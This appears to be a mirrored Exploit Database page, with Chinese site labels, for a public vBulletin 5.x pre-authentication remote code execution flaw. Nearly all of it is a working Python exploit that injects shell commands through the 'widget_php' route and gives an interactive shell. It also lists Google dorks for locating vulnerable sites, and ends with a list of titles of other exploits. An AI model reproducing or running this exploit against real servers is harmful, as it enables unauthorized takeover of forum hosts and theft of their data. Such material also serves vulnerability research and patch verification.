vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution

Exploit Database
9 阅读

作者： anonymous

日期： 2019-09-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47447/

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
 try:
cmd = raw_input("vBulletin$ ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
if r.status_code == 200:
 print r.text
else:
 sys.exit("Exploit failed! :(")
 except KeyboardInterrupt:
sys.exit("\nClosing shell...")
 except Exception, e:
sys.exit(str(e))

last Exploits
vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution的更多信息

Wing FTP Server 6.2.5 – Privilege Escalation：
WordPress Plugin BackWPup – Remote Code Execution / Local Code Execution：
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities：
Istgah For Centerhost – ‘view_ad.php’ Cross-Site Scripting：
SiteX CMS 0.7.4 Beta – ‘photo.php’ SQL Injection：
Jahia xCM – ‘/engines/manager.jsp?site’ Cross-Site Scripting：
TestLink 1.19 – Arbitrary File Download (Unauthenticated)：
WordPress Plugin Sodahead Polls 2.0.2 – Multiple Cross-Site Scripting Vulnerabilities：